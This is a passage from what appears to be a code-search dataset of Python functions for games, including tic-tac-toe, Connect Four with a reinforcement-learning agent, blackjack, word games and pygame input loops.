6)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(8):\n self.record_move(self.our_squares, self.our_symbol, 8)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(3):\n self.record_move(self.our_squares, self.our_symbol, 3)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(7):\n self.record_move(self.our_squares, self.our_symbol, 7)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.players_last_move == 7:\n if self.is_square_free(8):\n self.record_move(self.our_squares, self.our_symbol, 8)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(4):\n self.record_move(self.our_squares, self.our_symbol, 4)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(9):\n self.record_move(self.our_squares, self.our_symbol, 9)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(1):\n self.record_move(self.our_squares, self.our_symbol, 1)\n self.finish_move(self.our_symbol, self.our_squares)\n # No fancy logic here!\n elif self.is_square_free(1):\n self.record_move(self.our_squares, self.our_symbol, 1)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(3):\n self.record_move(self.our_squares, self.our_symbol, 3)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(9):\n self.record_move(self.our_squares, self.our_symbol, 9)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(7):\n self.record_move(self.our_squares, self.our_symbol, 7)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(2):\n self.record_move(self.our_squares, self.our_symbol, 2)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(6):\n self.record_move(self.our_squares, self.our_symbol, 6)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(8):\n self.record_move(self.our_squares, self.our_symbol, 8)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(4):\n self.record_move(self.our_squares, self.our_symbol, 4)\n self.finish_move(self.our_symbol, self.our_squares)", "def play():\n global done\n done = False\n g = Game()\n turn = random.choice([PLAYER, AI])\n transitions_agent = []\n agent.epsilon = agent.eps_min\n while done == False:\n g.printBoard()\n if turn == PLAYER:\n row = input('{}\\'s turn:'.format('Red'))\n g.insert(int(row), PLAYER_PIECE)\n else:\n observation = []\n for sublist in g.board:\n for i in sublist:\n observation.append(i)\n observation = np.asarray(observation)\n action = agent.choose_action(observation)\n if g.check_if_action_valid(action):\n print('{}\\'s turn: %d'.format('Yellow') % action)\n g.insert(action, AI_PIECE)\n else:\n while g.check_if_action_valid(action) == False:\n agent.store_transition(observation, action, -100, observation, done)\n action = action = np.random.randint(7)\n print('{}\\'s turn: %d'.format('Yellow') % action)\n g.insert(action, AI_PIECE)\n observation_ = []\n for sublist in g.board:\n for i in sublist:\n observation_.append(i)\n observation_ = np.asarray(observation_)\n transitions_agent += [(observation, action, observation_, done)]\n turn = AI if turn == PLAYER else PLAYER\n winner = AI if turn == PLAYER else PLAYER\n if winner == AI:\n reward = 20\n else:\n reward = -20\n for i in range(len(transitions_agent)):\n agent.store_transition(transitions_agent[i][0], transitions_agent[i][1], reward, transitions_agent[i][2],\n transitions_agent[i][3])\n agent.learn()\n return", "def next_move(board, player):\n \n move_row = \"move\"\n move_column = \"move\"\n\n while not move_row.isnumeric():\n move_row = input(\"{}, pick row to place your {}. > \".format(player.name, player.char))\n while not move_column.isnumeric(): \n move_column = input(\"Pick column in row {} to place your {}. > \".format(move_row, player.char))\n\n move_row = int(move_row)\n move_column = int(move_column)\n\n move = Move(player, (move_row, move_column))\n \n # Check if move is out of bounds\n if (move_row >= len(board.current_board) or\n move_column >= len(board.current_board)):\n print(\"Move out of bounds. Choose a valid move.\")\n return board\n\n # Check if space is already used\n if board.current_board[move_row][move_column] != \"-\":\n print(\"Spot already played. Pick an unused space.\")\n return board\n\n board.last_move = player.name\n board.add_move(move)\n\n return board", "def play_move(self,state):\n #Keep asking for the next move until a valid move.\n while(True):\n childList = state.get_successors()\n print(\"Your possible moves:\")\n i = 0\n for c in childList:\n if i > 0 and i%4 == 0:\n print()\n print(c.get_action().ljust(10),end=\"\\t\");\n i += 1\n print()\n nextMove = input(\"What is your next move? \\ne.g.'F2-E3' or 'Quit'\\n\")\n #Check if the move is valid\n if nextMove.lower() == 'Quit'.lower():\n return None\n for c in childList:\n if c.get_action().upper() == nextMove.upper():\n return c\n # Move not possible \n print(\"Invalid move!! Please try again...\\n\")", "def player_play(self, color, x, y):\r\n self.tr.bd.disks[x][y].color,\r\n self.tr.bd.disks[x][y].display_on = color, True\r\n self.tr.bd.disks[x][y].chain()\r\n self.tr.board_scan_reset()\r\n # Checks for computer move, if none, then checks for another move\r\n if self.tr.board_scan():\r\n self.delay = frameCount\r\n return\r\n else:\r\n self.tr.board_scan_reset()\r\n if not self.tr.board_scan():\r\n return\r\n # If none, ends game.\r\n else:\r\n self.tr.board_scan_reset()\r\n self.tr.scanner()\r\n self.tr.game_over = True\r\n self.tr.run_game_is_over = frameCount", "def handle_input_event(self):\n\n self.markerPos = self.get_mouse_coordinate()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n raise QuitRequestedError\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n raise QuitRequestedError\n if event.type == pygame.MOUSEBUTTONDOWN:\n if Event.is_valid_placement_stage(self.event):\n self.choice = self.get_mouse_coordinate()\n self.event = Event.next(self.event)\n self.timestep_watch.reset()\n\n liberties = self.env.liberty_after_next_steps(self.env.turn, self.env.getOpponent())\n self.env.printField(liberties)\n print()\n # self.env.printFlipNum(self.env.turn)\n # print(self.env.update_num_disks_can_filp(self.choice[0], self.choice[1], self.env.turn))\n\n # print(\"Click \", pos, \"coordinates: \", row, col)", "def main():\n \n games = 'chess simon puzzle chess go slide go sudoku snake'.split()\n gi = 0\n game = games[gi]\n board = set_game(game)\n board.keys[K_t] = test\n \n while board.active:\n for event in pygame.event.get():\n board.do_event(event)\n if event.type == KEYDOWN:\n if event.key == K_g:\n gi = (gi + 1) % len(games)\n board = set_game(games[gi])\n \n board.update()\n \n pygame.quit()", "def perform_action(self, current_player, action):\n self.inputs_[action] = current_player\n if Config.USER['debug']['enabled']:\n print \"---\"\n print str(self.inputs_[0:3])\n print str(self.inputs_[3:6])\n print str(self.inputs_[6:9])", "def play_game(cls):\n os.system('cls')\n # Get the board size\n prompt = \"What size board do you want? (3-10)\"\n size = input(prompt)\n while size not in [str(x) for x in range(3, 11)]:\n size = input(prompt)\n cls.size = int(size)\n\n cls.clear_board()\n\n # Non-blocking fashion\n listener = keyboard.Listener(on_release=cls.on_release)\n listener.start()", "def play_minion(num_cards_in_hand, card_idx):\n click_on_card(num_cards_in_hand, card_idx)\n mouseclick(510, 472)", "def ask_user():\r\n while True:\r\n if bj.player1.double_down is True and bj.player1.split is True and bj.player1.went_split is False:\r\n p_choice = input(\"Hit, Stand, Double Down or Split?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\" and p_choice != \"dd\" and p_choice != \"double\" and p_choice != \"double down\" and p_choice != \"split\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice\r\n elif bj.player1.split is True and bj.player1.went_split is False: # various input prompts depending on available player choices\r\n p_choice = input(\"Hit, Stand or Split?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\" and p_choice != \"split\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice\r\n elif bj.player1.double_down is True:\r\n p_choice = input(\"Hit, Stand or Double Down?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\" and p_choice != \"dd\" and p_choice != \"double\" and p_choice != \"double down\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice\r\n else:\r\n p_choice = input(\"Hit or Stand?\\n\")\r\n if p_choice != \"hit\" and p_choice != \"stand\":\r\n print(\"Wrong input.\\n\")\r\n continue\r\n else:\r\n return p_choice", "def play():\n\n while True:\n print(\"Press any key to pick a piece (or q to quit): \")\n user_input = getch.getch()\n clear_screen()\n\n if user_input != 'q':\n current_piece = choice(list(pieces.keys())) \n print(current_piece, ': ', pieces[current_piece]['icon'], '\\n', sep=\"\")\n print(pieces[current_piece]['move'], '\\n')\n else:\n print(\"Thanks for trying No Stress Chess®\")\n break", "def process_input(self):\n for event in pygame.event.get():\n\n if self.joystick and self.state == self.STATE_PLAY:\n\n if event.type == pygame.JOYAXISMOTION:\n self.gameevents.add(\"joyaxismotion\", event.axis, event.value, type='EVENT_USER')\n elif event.type == pygame.JOYBUTTONDOWN:\n if event.button == self.fire_button:\n self.gameevents.add(\"press\", \"fire\", type='EVENT_USER')\n elif event.button == self.IFF_button:\n self.gameevents.add(\"press\", \"iff\", type='EVENT_USER')\n elif event.button == self.shots_button:\n self.gameevents.add(\"press\", \"shots\", type='EVENT_USER')\n elif event.button == self.pnts_button:\n self.gameevents.add(\"press\", \"pnts\", type='EVENT_USER')\n elif event.type == pygame.JOYBUTTONUP:\n if event.button == self.fire_button:\n self.gameevents.add(\"release\", \"fire\", type='EVENT_USER')\n elif event.button == self.IFF_button:\n self.gameevents.add(\"release\", \"iff\", type='EVENT_USER')\n elif event.button == self.shots_button:\n self.gameevents.add(\"release\", \"shots\", type='EVENT_USER')\n elif event.button == self.pnts_button:\n self.gameevents.add(\"release\", \"pnts\", type='EVENT_USER')\n\n else:\n\n if event.type == pygame.KEYDOWN:\n\n if (pygame.key.get_mods() & self.modifier):\n if event.key == pygame.K_q:\n self.gameevents.add(\"press\", \"quit\", type='EVENT_USER')\n\n if event.key == pygame.K_RETURN:\n\n if self.state == self.STATE_INTRO:\n self.state = self.STATE_SETUP\n\n elif self.state == self.STATE_SETUP:\n self.state = self.STATE_GAMENO\n\n elif self.state == self.STATE_GAMENO:\n if self.mine_exists:\n self.state = self.STATE_SETUP_IFF\n else:\n self.state = self.STATE_PREPARE\n\n elif self.state == self.STATE_IFF:\n self.state = self.STATE_PREPARE\n\n elif self.state == self.STATE_SCORES:\n self.state = self.STATE_SETUP\n\n elif self.state == self.STATE_PLAY:\n\n if event.key == self.thrust_key:\n self.gameevents.add(\"press\", \"thrust\", type='EVENT_USER')\n elif event.key == self.left_turn_key:\n self.gameevents.add(\"press\", \"left\", type='EVENT_USER')\n elif event.key == self.right_turn_key:\n self.gameevents.add(\"press\", \"right\", type='EVENT_USER')\n elif event.key == self.fire_key:\n self.gameevents.add(\"press\", \"fire\", type='EVENT_USER')\n elif event.key == self.IFF_key:\n self.gameevents.add(\"press\", \"iff\", type='EVENT_USER')\n elif event.key == self.shots_key:\n self.gameevents.add(\"press\", \"shots\", type='EVENT_USER')\n elif event.key == self.pnts_key:\n self.gameevents.add(\"press\", \"pnts\", type='EVENT_USER')\n elif event.key == self.pause_key and self.config['General']['allow_pause']:\n self.gameevents.add(\"press\", \"pause\", type='EVENT_USER')\n else:\n self.gameevents.add(\"press\", event.key, \"user\", type='EVENT_SYSTEM')\n \n elif self.state == self.STATE_PAUSED and event.key == self.pause_key:\n self.gameevents.add(\"press\", \"unpause\", type='EVENT_USER')\n \n else:\n self.gameevents.add(\"press\", event.key, \"user\", type='EVENT_SYSTEM')\n\n elif event.type == pygame.KEYUP:\n\n if self.state == self.STATE_PLAY:\n\n if event.key == self.thrust_key:\n self.gameevents.add(\"release\", \"thrust\", type='EVENT_USER')\n elif event.key == self.left_turn_key:\n self.gameevents.add(\"release\", \"left\", type='EVENT_USER')\n elif event.key == self.right_turn_key:\n self.gameevents.add(\"release\", \"right\", type='EVENT_USER')\n elif event.key == self.fire_key:\n self.gameevents.add(\"release\", \"fire\", type='EVENT_USER')\n elif event.key == self.IFF_key:\n self.gameevents.add(\"release\", \"iff\", type='EVENT_USER')\n elif event.key == self.shots_key:\n self.gameevents.add(\"release\", \"shots\", type='EVENT_USER')\n elif event.key == self.pnts_key:\n self.gameevents.add(\"release\", \"pnts\", type='EVENT_USER')", "def play_DQN_game(self):\n self.reset()\n while(not self._exit):\n pg.event.pump()\n self.clock.tick(self.actions_per_second)\n self.check_for_exit()\n self.handle_keyboard_input()\n self.perform_DQN_actions()\n self.check_for_end_game()\n self.render()\n\n self.cleanup()", "def handle_turn(player_):\n if player_ == computer:\n print('\\nNow ', player_ + \"'s turn.\")\n position = block_to_win()\n if position == -1:\n position = check_if_computer_can_win()\n if position == -1:\n position = randrange(0, 9)\n while board[position] not in ['_']:\n position = randrange(0, 9)\n board[position] = computer\n display_board()\n if player_ == player:\n print('\\nNow ', player_ + \"'s turn.\")\n position = int(input('Choose a position from 1-9 (available): '))\n while position not in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n position = int(input('Wrong input. Choose a position from 1-9: '))\n position = position - 1\n while board[position] not in ['_']:\n position = int(input('Position is already taken. Choose from available positions: '))\n position = position - 1\n board[position] = player\n display_board()", "def player_turn(self):\n if self.turn == \"x\":\n player_name = self.player_1\n else:\n player_name = self.player_2\n\n player_choice = input(f\"{player_name}, pick an open box to put an {self.turn} by entering the column, 'a', 'b',\"\n f\" or 'c' and the cell number, 1, 2, 3. (e.g. 'a1', 'b2' or 'c3'):\\n\").strip().lower()\n\n while player_choice not in valid_choices:\n print(f\"Invalid choice entered! Please submit an open box as listed below\")\n player_choice = input(\n f\"{player_name}, pick an open box to put an {self.turn} by entering the column, 'a', 'b', or \"\n f\"'c' and the cell number, 1, 2, 3. (e.g. 'a1', 'b2' or 'c3'):\\n\").strip().lower()\n\n self.update_board(player_choice)", "def get_player_action(self) -> None:\n print(f\"\\nYou have: {self.user.hand.cards} totalling to {self.user.hand.value}\")\n while not self.get_game_ending_hands():\n action = self.validate_input(\"Do you want to 1. hit or 2. stand?\", ('1', '2'))\n if action == '1':\n self.action_hit()\n elif action == '2':\n self.action_stand()\n break", "def play_cpu(self):\n \n # Play button sound\n self.button_sound()\n\n while True:\n\n # If turns is 9, then all the places on the board are filled. Hence Cpu doesn't get a turn. \n if self.turn >= 9:\n break\n\n # Choose a random position and if that position on board is empty, then place a 'O' there.\n i = random.randint(0, 8)\n if self.board[i] == 0:\n #root.after(400)\n self.button_list[i].config(image=self.O_img)\n self.board[i] = -1\n self.turn += 1\n\n break", "def random_play(board, NN, device=\"cpu\"):\r\n board_state_string = board.fen() # obtain state from board\r\n state_array = input_state(board_state_string) # turn state into an array format for NN\r\n is_black = not is_white(board_state_string)\r\n print(\"is black: \",is_black)\r\n legal_moves_array = np.zeros([4672]) # initialize array of legal moves\r\n legal_moves_array, move_dict = return_legal_moves(board, is_black)\r\n # print(\"state array shape: \", state_array.shape)\r\n # print(\"legal array sahpe: \", legal_moves_array.shape)\r\n legal_moves_prob_distribution, _ = (NN.run(state_array, legal_moves_array, device=device)) #we're assuming that NN forward runs the neural network\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution / np.sum(legal_moves_prob_distribution) # normalize\r\n legal_moves_prob_distribution = legal_moves_prob_distribution.numpy().reshape(4672)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution - np.min(legal_moves_prob_distribution)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution /legal_moves_prob_distribution.sum()\r\n # print(\"legal_moves_prob_distribution sum \",abs(legal_moves_prob_distribution).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution* legal_moves_arrayCopy).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution).sum())\r\n action_idx = np.random.choice(4672, p = legal_moves_prob_distribution )\r\n print(\"action idx: \", action_idx)\r\n action_array = np.zeros([4672])\r\n action_array[action_idx] = 1\r\n move_text = move_dict[action_idx]\r\n print(\"move text: \", move_text)\r\n env_move = chess.Move.from_uci(move_text)\r\n board.push(env_move)\r\n return action_array", "def play_gui():\n global done\n GAME_OVER = False\n pygame.init()\n board = create_board()\n\n screen = pygame.display.set_mode(SIZE)\n draw_board(board, screen)\n pygame.display.update()\n\n myfont = pygame.font.SysFont(\"monospace\", 75)\n turn = np.random.randint(0, 2)\n\n while not GAME_OVER:\n g = Game()\n done = False\n transitions_agent = []\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if event.type == pygame.MOUSEMOTION:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n posx = event.pos[0]\n if turn == PLAYER:\n pygame.draw.circle(screen, red, (posx, int(SQUARESIZE / 2)), RADIUS)\n pygame.display.update()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n\n if turn == PLAYER:\n posx = event.pos[0]\n col = int(math.floor(posx / SQUARESIZE))\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, PLAYER_PIECE)\n\n if winning_move(board, PLAYER_PIECE):\n label = myfont.render(\"Player 1 wins!!\", 1, red)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n turn = (turn + 1) % 2\n draw_board(board, screen)\n\n # # Ask for Player 2 Input\n if turn == AI and not GAME_OVER:\n observation = []\n #print(f\"BOARD: {board}\")\n temp_board = np.flipud(board)\n for col in range(COLUMN_COUNT):\n col_elements = temp_board[:,col]\n for element in col_elements:\n observation.append(element)\n\n #print(f\"OBS: {observation}\")\n observation = np.asarray(observation)\n col = agent.choose_action(observation)\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2\n\n else:\n print(\"AI random choice\")\n col = np.random.randint(7)\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2", "def main():\r\n print(WELCOME_MESSAGE)\r\n\r\n playing = True\r\n while playing:\r\n\r\n # Valid inputs that the user can use\r\n move_actions = (UP, DOWN, LEFT, RIGHT)\r\n other_actions = (GIVE_UP, HELP)\r\n\r\n grid_size = int(input(BOARD_SIZE_PROMPT))\r\n\r\n # Get the puzzle and its solution\r\n solution = get_game_solution(WORDS_FILE, grid_size)\r\n puzzle = shuffle_puzzle(solution)\r\n\r\n solved = check_win(puzzle, solution)\r\n print_solution_position(solution, puzzle)\r\n\r\n # Continue to loop until the puzzle is solved or the user gives up\r\n while not solved:\r\n player_action = input(DIRECTION_PROMPT)\r\n\r\n # Player move input handler\r\n # Updates the puzzle with the new board layout, if fail alert user\r\n if player_action in move_actions:\r\n move_attempt = move(puzzle, player_action)\r\n if move_attempt:\r\n puzzle = move_attempt\r\n else:\r\n print(INVALID_MOVE_FORMAT.format(player_action))\r\n\r\n # Other inputs handler\r\n elif player_action in other_actions:\r\n if player_action == GIVE_UP:\r\n break\r\n elif player_action == HELP:\r\n print(HELP_MESSAGE)\r\n\r\n # If there is no match for input, alert the user\r\n else:\r\n print(INVALID_MESSAGE)\r\n\r\n print_solution_position(solution, puzzle)\r\n solved = check_win(puzzle, solution)\r\n\r\n # Show message depending if user won or not\r\n if solved:\r\n print(WIN_MESSAGE)\r\n else:\r\n print(GIVE_UP_MESSAGE)\r\n\r\n # Check if the user wishes to play again\r\n play_again = input(PLAY_AGAIN_PROMPT)\r\n if not (play_again.lower() == \"y\" or play_again == \"\"):\r\n playing = False\r\n print(BYE)", "def play(auto_A: bool = False, auto_B: bool = False) -> None:\n board: Board = Board()\n player: Player = Player.A\n move_count: int = 1\n cell_number: int = 0\n print('Welcome to the Tic-Tac-Toe game!')\n while move_count <= 9:\n print(board.display())\n player_name: str = player.display()\n\n if player == Player.A and auto_A or player == Player.B and auto_B:\n cell_number = minimax(board, player)\n print(f'[{move_count}] Player {player_name} moved to {cell_number}.')\n else:\n response: str = input(f'[{move_count}] Player {player_name}, enter your move or q to exit: ')\n\n if response == 'q':\n print(\"Game exited.\")\n break\n\n response_error: Optional[str] = validate_response(response)\n if response_error is not None:\n print(f'ERROR! {response_error}')\n continue\n\n cell_number = int(response)\n if not board.is_cell_empty(cell_number):\n print(f'ERROR! Cell number {cell_number} is not empty.')\n continue\n\n board = board.make_move(player, cell_number)\n if board.is_win(player):\n print(board.display())\n print(f'Congratulations, player {player_name}! You won in {move_count} moves.')\n break\n else:\n move_count += 1\n player = player.switch()\n if move_count > 9:\n print(board.display())\n print('This game has ended in a draw.')", "def check_for_input(self):\n if self.state == 'resting':\n if self.keys[pg.K_UP]:\n self.begin_moving('up')\n elif self.keys[pg.K_DOWN]:\n self.begin_moving('down')\n elif self.keys[pg.K_LEFT]:\n self.begin_moving('left')\n elif self.keys[pg.K_RIGHT]:\n self.begin_moving('right')", "def playGame(b, px, po):\n \n nextPieceToMove = [\"X\",\"O\"] \n nextPlayerToMove = [px,po]\n n=0\n # FILL IN CODE HERE\n while True:\n if b.isFull() == False and nextPlayerToMove[n%2] == \"human\":\n move = askformove(b)\n b.addMove(move, nextPieceToMove[n%2])\n print(b)\n if b.winsFor(nextPieceToMove[n%2]):\n nextPieceToMove = nextPieceToMove[n%2]\n print(nextPieceToMove + \" wins!\")\n break\n elif not b.isFull():\n move = nextPlayerToMove[n%2].nextMove(b)\n b.addMove(move, nextPieceToMove[n%2])\n print(b)\n if b.winsFor(nextPieceToMove[n%2]):\n nextPieceToMove = nextPieceToMove[n%2]\n print(nextPieceToMove + \" wins!\")\n break\n else:\n nextPieceToMove = \"D\"\n break\n n = 1+n \n return(b.data, nextPieceToMove)", "def main(self):\n while 1:\n events = get_gamepad()\n for event in events:\n\n if(event.ev_type == \"Absolute\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.absolute_switch[ self.map[GAMEPAD][event.code] ](event.state)\n\n\n if(event.ev_type == \"Key\" ):\n\n if event.code in self.map[GAMEPAD].keys():\n self.btn_switch[ self.map[GAMEPAD][event.code] ](self.map[GAMEPAD][event.code], event.state)\n \n\n\n\n #print(event.ev_type, event.code, event.state)", "def play_game(word_list):\n # TO DO ...\n\n hand = deal_hand(HAND_SIZE) # random init\n\n while True:\n cmd = input('Enter n to deal a new hand, r to replay the last hand, or e to end game: ')\n\n if cmd == 'n':\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list)\n print()\n\n elif cmd == 'r':\n play_hand(hand.copy(), word_list)\n print()\n\n elif cmd == 'e':\n break\n\n else:\n print(\"Invalid command.\")", "def main():\r\n lp = launchpad_py.Launchpad() \r\n lp.Open()\r\n lp.LedAllOn(0)\r\n displayField(lp)\r\n player = 1\r\n while True:\r\n time.sleep(0.01)\r\n if player == 1:\r\n letter = \" X \"\r\n if player == 2:\r\n letter = \" O \"\r\n if setCross(lp, player, field, letter):\r\n if player == 1:\r\n player = 2\r\n else:\r\n player = 1\r\n if theWinnerIs(field, letter):\r\n if letter == \" X \":\r\n allOnForWinner(field,letter,lp)\r\n if letter == \" O \":\r\n allOnForWinner(field,player,lp)\r\n break\r\n if equal(field):\r\n lp.LedAllOn(lp.LedGetColor(3, 3))\r\n break", "def GetNextMove(board, index, teams, mover):\n\tif teams[mover] == 'H':\n\t\twhile True:\n\t\t\tmove = int(input('Tell me your move, {}: '.format(mover)))\n\t\t\tresult = ValidateMove(board, mover, move)\n\t\t\tif result == MoveValidation.Valid:\n\t\t\t\treturn move\n\telse:\n\t\treturn GetComputerMove(board, index, mover)", "def run_next(self, action):\r\n self.screen.fill((0, 0, 0))\r\n\r\n # Run the simulation loop\r\n self.SimulationLoop(action)\r\n if GUIEnabled and self.settings.drawMenu:\r\n self.gui_app.paint(self.screen)\r\n\r\n pygame.display.flip()\r\n self.clock.tick(self.settings.hz)\r\n self.fps = self.clock.get_fps()", "def play_game(word_list):\n hand = deal_hand(HAND_SIZE)\n\n while True:\n game = raw_input(\"\\nEnter 'n' to play a new game. Enter 'r' to replay your last game. Enter 'e' to exit. \\n\")\n\n if game == \"n\":\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list)\n elif game == \"r\":\n play_hand(hand.copy(), word_list)\n elif game == \"e\":\n print \"Game ended.\"\n break\n else:\n print \"Please enter a valid command.\"\n return play_game(word_list)\n\n comp_game = raw_input((\"\\nEnter 'u' to play a new game. Enter 'c' to have the computer play a game.\"))\n\n while comp_game != \"u\" and comp_game != \"c\":\n print \"Please enter a valid command.\"\n comp_game = raw_input((\"\\nEnter 'u' to play a new game. Enter 'c' to have the computer play a game. \"))\n\n if comp_game == \"u\":\n hand = deal_hand(HAND_SIZE)\n play_hand(hand.copy(), word_list)\n elif comp_game == \"c\":\n hand = deal_hand(HAND_SIZE)\n comp_play_hand(hand.copy(), word_list)", "def playGameplus(wordList):\n #选择游戏模式\n global la_st2\n n = 0\n print '请选择你想进行的模式:a:单人 c:人机 e: 退出游戏'\n while True:\n order9 = raw_input('>>>').lower()\n if (order9 == 'a') or (order9 =='c'):\n moudl = True\n break\n elif order9 == 'e':\n moudl = False\n print '游戏已退出'\n print ' = ' * 20\n break\n else:\n print '命令有误,请重新输入'\n if moudl:\n print 'n:新的游戏 r:重开上局 e:退出'\n order8 = raw_input('>>>').lower() \n while True:\n if order8 == 'n':\n while True:\n n = raw_input('你想获取的字母数(大于4个):')\n while True:\n try:\n n = int(n)\n if n > 4:\n break\n except ValueError,e:\n print '输入有误!'\n if order9 == 'a':\n hand = dealHand(n)\n la_st = copy.deepcopy(hand)\n playHand(hand, wordList, n)\n elif order9 == 'c':\n hand = dealHand(n)\n la_st = copy.deepcopy(hand)\n playHandplus(hand, wordList, n)\n if order8 == 'r':\n if la_st2 and (order9 == 'a'):\n playHand(la_st, wordList, n)\n elif la_st2 and (order9 == 'c'):\n playHandplus(hand, wordList, n)\n elif not la_st2:\n print '您没有上局存档,请重新输入指令:'\n order8 = raw_input('>>>').lower()\n if order8 == 'e':\n print '游戏结束'\n break\n if not order8 in ['r','n','e'] or order8 == '':\n print '请重新输入指令:'\n order8 = raw_input('>>>').lower()", "def nextQuestion(self):\n\t\tif len(self.usedQuestions) == self.numQuestions:\n\t\t\tif not self.nextRound():\n\t\t\t\treturn\n\n\t\tif self.selectingPlayer == '' or self.players[self.selectingPlayer][2] == 'Disconnected':\n\t\t\tself.choosePlayer()\n\t\telse:\n\t\t\tself.changeStatus(self.selectingPlayer, 'Selecting')\n\n\t\tfor player in self.players.items():\n\t\t\ttry:\n\t\t\t\tplayer[1][0].displayGrid()\n\t\t\texcept (ConnectionClosedError, ProtocolError):\n\t\t\t\tself.changeStatus(player[0], 'Disconnected')\n\n\t\tself.gridDisplayed.emit()", "def playGame(wordList):\n while True:\n user_input = str(input('Enter n to deal a new hand, r to replay the last hand, or e to end game: '))\n if user_input == 'e':\n break\n elif user_input == 'n':\n while True:\n play_mode = str(input('Enter u to have yourself play, c to have the computer play: '))\n if play_mode == 'u':\n hand = dealHand(HAND_SIZE)\n playHand(hand, wordList, HAND_SIZE)\n break\n elif play_mode == 'c':\n hand = dealHand(HAND_SIZE)\n compPlayHand(hand, wordList, HAND_SIZE)\n break\n else:\n print('Invalid command.') \n elif user_input == 'r':\n try:\n hand\n play_mode = str(input('Enter u to have yourself play, c to have the computer play: '))\n if play_mode == 'u':\n playHand(hand, wordList, HAND_SIZE)\n elif play_mode == 'c':\n compPlayHand(hand, wordList, HAND_SIZE)\n else:\n print('Invalid command.')\n except:\n print('You have not played a hand yet. Please play a new hand first!')\n else:\n print('Invalid command.')", "def update(self, player_index=0, num_players=1, visible_scards = []):\n\n self.visible_scards = visible_scards\n self.controller._state.player_index = player_index\n if self.num_players > num_players and self.controller._state.rules.Shared_Board \\\n and not self.need_updated_buttons:\n # A player has left the game after the round has begun -- make adjustments so game can continue.\n self.playerLeftGame(num_players)\n self.num_players = num_players\n if self.controller._state.round == -1:\n self.mesgBetweenRounds(self.help_text)\n if self.round_advance:\n self.round_index = self.round_index + 1\n if self.round_index < len(self.Meld_Threshold):\n self.help_text[0] = 'This is the round of ' + str(self.Meld_Threshold[self.round_index]) + ' ! '\n self.need_updated_buttons = True # used for Liverpool.\n else:\n self.help_text = ['Game has concluded. Scores for each round can be found in command window.']\n self.round_advance = False\n else:\n if not self.round_index == self.controller._state.round:\n # Need this to true up round_index if a player joins mid-game.\n skipped_rounds = self.controller._state.round - self.round_index\n for idx in range(skipped_rounds):\n #todo: How to score latecomers should be moved to ruleset.\n score = 0\n self.controller.lateJoinScores(score)\n self.round_index = self.controller._state.round\n self.round_advance = True\n # reset outline colors on ready buttons to what they need to be at the start of the \"between rounds\" state.\n self.ready_color_idx = 2\n self.not_ready_color_idx = 6\n self.last_hand = self.current_hand\n self.current_hand = self.controller.getHand()\n if len(self.current_hand) == 0:\n self.hand_info = []\n elif not self.last_hand == self.current_hand:\n self.hand_info = HandManagement.WrapHand(self, self.current_hand, self.hand_info)\n HandManagement.ShowHolding(self, self.hand_info) # displays hand\n self.RuleSetsButtons.ButtonDisplay(self)", "def playGame(wordList):\n hand = None\n while True:\n selection = raw_input(\"Enter n to deal a new hand, r to replay the last hand, or e to end game:\")\n if selection == 'n':\n hand = dealHand(HAND_SIZE)\n playHand(hand, wordList, HAND_SIZE)\n print\n \n elif selection == 'r':\n if hand is None:\n print \"You have not played a hand yet. Please play a new hand first!\"\n print\n \n else:\n playHand(hand, wordList, HAND_SIZE)\n\n elif selection == 'e':\n break\n\n else: \n print \"Invalid command.\"", "def listenMove(s):\n debugPrint(\"FUNCTION AcornClient.listenMove()\")\n print(grid)\n loop = True\n while loop:\n move = input(\">>> \").lower()\n if move in ['w']:\n loop = False\n sendMove(s, 'up')\n elif move in 